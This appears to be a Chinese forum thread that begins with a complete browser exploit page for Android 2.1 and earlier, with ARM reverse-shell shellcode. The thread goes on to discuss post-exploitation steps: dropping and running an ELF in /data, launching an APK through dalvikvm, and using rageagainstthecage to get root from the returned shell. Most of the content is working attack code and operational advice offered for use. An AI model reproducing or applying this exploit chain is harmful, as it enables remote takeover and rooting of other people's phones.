这是样本网页代码，需要安卓2.1以下版本（包含2.1）

<html>
<!--
This is the exploit used in my Austin bsides presentation that returns a shell. The slides are at http://www.slideshare.net/mjza/bsides
email: mkeith AT exploitscience.org
-->

<head>
<script language="JavaScript">
function heap()
{

var id = document.getElementById("target");
var attribute = id.getAttributeNode('id');
nodes = attribute.childNodes;
document.body.removeChild(id);
attribute.removeChild(nodes[0]);
setTimeout(function() { for (var i = 0; i < 70000; i++) {var s = new String(unescape("\u0058\u0058")); };

var scode = unescape("\u0060\u0060");
var scode2 = unescape("\u5005\ue1a0");
var shell = unescape("\u1001\ue28f\uff11\ue12f\u2002\u2101\u2206\u020f\u3719\udf00\u1c06\ua10a\u2210\u3702\udf00\u273f\u1a49\u1c30\udf00\u2101\u1c30\udf00\u2102\u1c30\udf00\ua005\u1a92\ub405\u4669\u270b\udf00\u46c0");
shell += unescape("\u0002\uae08");  //port
shell += unescape("\uxxxx\uxxxx");  //ip
shell += unescape("\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u0000");
//shell += unescape("\u622f\u6e69\u732f\u0068");
shell += unescape("\u2000\u2000");  //string terminate

do
{
  scode += scode;
  scode2 += scode2;

} while (scode.length<=0x1000);
  
scode2 += shell
  

        target = new Array();
        for(i = 0; i < 300; i++){
           
            if (i<130){ target[i] = scode;}
            if (i>130){ target[i] = scode2;}

                  document.write(target[i]);
                  document.write("<br />");
                if (i>250){
                       //  alert("freeze");
                         nodes[0].textContent}

}

}, 0);
}
</script>
</head>
<body onload=heap()>
<p id=target></p>
</body>
</html>

欧，有关elf文件的下载执行搞定了，文件写到/data下面然后chmod 777就可以运行了
但我如果把apk文件写到/data下面而不是/data/app(需root权限)下面，能用am start命令运行这个apk吗？

你chmod也是需要权限的呀，运行APK可以使用dalvikvm

是的，对/data/app文件夹进行chmod 777就失败了。。。
对于apk的执行，大神能不能说得详细一些呢？我把apk转成了jar文件，写到/data/下面，
然后dalvikvm -cp /data/pdx.jar PdxActivity，它显示：

# dalvikvm -cp /data/pdx.jar PdxActivity
dalvikvm -cp /data/pdx.jar PdxActivity
Dalvik VM unable to locate class 'PdxActivity'
java.lang.NoClassDefFoundError: PdxActivity
        at dalvik.system.NativeStart.main(Native Method)
Caused by: java.lang.ClassNotFoundException: PdxActivity in loader dalvik.system.Pa
thClassLoader[/data/pdx.jar]
        at dalvik.system.PathClassLoader.findClass(PathClassLoader.java:240)
        at java.lang.ClassLoader.loadClass(ClassLoader.java:551)
        at java.lang.ClassLoader.loadClass(ClassLoader.java:511)
        ... 1 more

提权

我打算用rageagainstthecage-arm5.bin提权
不过它好象是对adb进程进行exploit,也就是只能用在adb shell里?
我好象见到过把它改成对zygote进程进行exploit，然后编译成apk文件形式运行的版本。。
不知道在漏洞反弹过来的shell里能不能用rageagainstthecage刷root~